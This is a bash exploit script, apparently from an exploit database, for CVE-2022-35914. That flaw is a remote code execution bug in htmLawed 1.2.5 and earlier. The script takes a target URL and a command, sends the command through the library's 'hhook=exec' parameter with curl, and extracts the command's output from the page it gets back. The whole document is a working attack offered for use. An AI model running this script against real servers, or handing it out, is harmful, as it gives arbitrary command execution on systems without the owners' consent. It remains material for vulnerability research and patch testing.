#!/bin/bash # Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution # Date: 2024-05-02 # Exploit Author: Miguel Redondo (aka d4t4s3c) # Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed # Software Link: https://github.com/kesar/HTMLawed # Version: <= 1.2.5 # Tested on: Linux # Category: Web Application # CVE: CVE-2022-35914 while getopts ":u:c:" arg; do case ${arg} in u) url=${OPTARG}; let parameter_counter+=1 ;; c) cmd=${OPTARG}; let parameter_counter+=1 ;; esac done if [ -z "${url}" ] || [ -z "${cmd}" ]; then echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution" echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n" exit 1 else echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution" echo -e "\n[+] Executing Command: ${cmd}\n" cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\&nbsp; \[[0-9]+\] =\&gt;' | sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/') echo -e "${cmd_output}\n" exit 0 fi